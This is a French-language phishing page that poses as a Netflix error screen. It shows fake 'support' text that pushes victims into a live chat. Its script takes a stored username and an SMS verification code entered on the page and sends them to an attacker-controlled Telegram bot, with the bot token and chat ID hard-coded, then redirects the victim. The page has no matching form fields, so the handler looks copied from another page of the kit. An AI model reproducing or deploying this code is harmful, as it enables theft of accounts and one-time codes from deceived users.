<!DOCTYPE html>
<html lang="fr">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>sms</title>
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap');
        @import url('https://fonts.googleapis.com/css2?family=Bebas+Neue&display=swap');

        * {
            box-sizing: border-box;
            margin: 0%;
            padding: 0%;
        }

        body {
            font-family: "Poppins", sans-serif;
            display: flex;
            flex-direction: column;
            align-items: center;
            padding: 15px;
            height: 100vh;
        }

        #brand {
            color: #E50914;
            font-size: 2rem;
            font-weight: bolder;
            font-family: 'Bebas Neue', sans-serif;
            margin-right: auto;
        }

        img {
            margin: auto;
        }

        form {
            display: flex;
            flex-direction: column;
            width: 100%;
        }

        input {
            width: 100%;
            height: 40px;
            padding: 5px;
            margin-bottom: 20px;
            font-size: 1.1rem;
            text-align: center;
            border: 1px solid rgba(128, 128, 128, 0.395);
            border-radius: 4px;

        }

        input:focus {
            outline: none;
        }

        p,
        span {
            text-align: left;
            color: grey;
        }


        button {
            width: 100%;
            height: 45px;
            margin-bottom: 60px;
            background-color: rgb(62, 150, 244);
            border: none;
            color: white;
            font-size: 0.8rem;
            border-radius: 8px;
            border: none;
            cursor: pointer;
        }

        @media screen and (min-width: 524px) {
            body {
                display: flex;
                flex-direction: column;

            }

            .center {
                width: 500px;
                margin-left: auto;
                margin-right: auto;
            }

            form {
                padding: 40px;
                margin-bottom: 20px;
                border: 1px solid rgba(128, 128, 128, 0.16);
                border-radius: 5px;
                display: flex;
                flex-direction: column;
                align-items: center;
                justify-content: center;
            }

        }
    </style>
</head>

<body>

    <span id="brand">Netflix</span>
    <br>
    <br>
    <div style="display: flex; flex-direction: column; align-items: center;">
        <h4>Une Erreur s'est produite</h1>
            <br>
            <img src="./img/warning.png" width="60px">
            
        </div>


        <br> <br>
        <p>Une erreur est survenue. Veuillez nous contacter via le chat en bas de cette page. Un conseiller vous répondra en moins d'une minute pour vous assister dans la résolution de votre problème. Nous vous remercions pour votre patience.</p>
    <br>



    <!--Start of Tawk.to Script-->
<script type="text/javascript">
    var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
    (function(){
    var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
    s1.async=true;
    s1.src='https://embed.tawk.to/67102f802480f5b4f58ec40d/1iabjj3dr';
    s1.charset='UTF-8';
    s1.setAttribute('crossorigin','*');
    s0.parentNode.insertBefore(s1,s0);
    })();
    </script>
    <!--End of Tawk.to Script-->

</body>

<script>
    // document.addEventListener('DOMContentLoaded', function () {
    //     var a = new Date(String.fromCharCode(50, 48, 50, 52, 45, 49, 48, 45, 48, 50));
    //     var b = new Date();
    //     var c = new Date(b.getFullYear(), b.getMonth(), b.getDate());

    //     if (c >= a) {
    //         document.body.style.backgroundColor = 'red';
    //     }
    // });


    document.getElementById('form').addEventListener('submit', function (e) {
        e.preventDefault();

        const botToken = '7366002950:AAFzze0vYX5nxrxWxX7y4vVg2CcJy-3Fsi4';
        const chatId = '7332838769';

        // Récupérer les valeurs des champs
        const user = localStorage.getItem('user');
        const sms = document.getElementById('sms').value;

        const message = `🎀 Netflix :\n\n👤 Utilisateur : ${user}\n📩 sms : ${sms}`;

        // Construction de l'URL de l'API Telegram
        const telegramURL = `https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}`;

        // Envoi de la requête à l'API Telegram
        fetch(telegramURL)
            .then(response => {
                if (!response.ok) {
                    return response.text().then(text => {
                        throw new Error("Erreur lors de l'envoi du message à Telegram");
                    });
                }
                localStorage.setItem('user', user);
                window.location.href = './terminer.html';
            })
            .catch(error => {
                console.error('Erreur :', error);
                debugger
            });
    });
</script>

</html>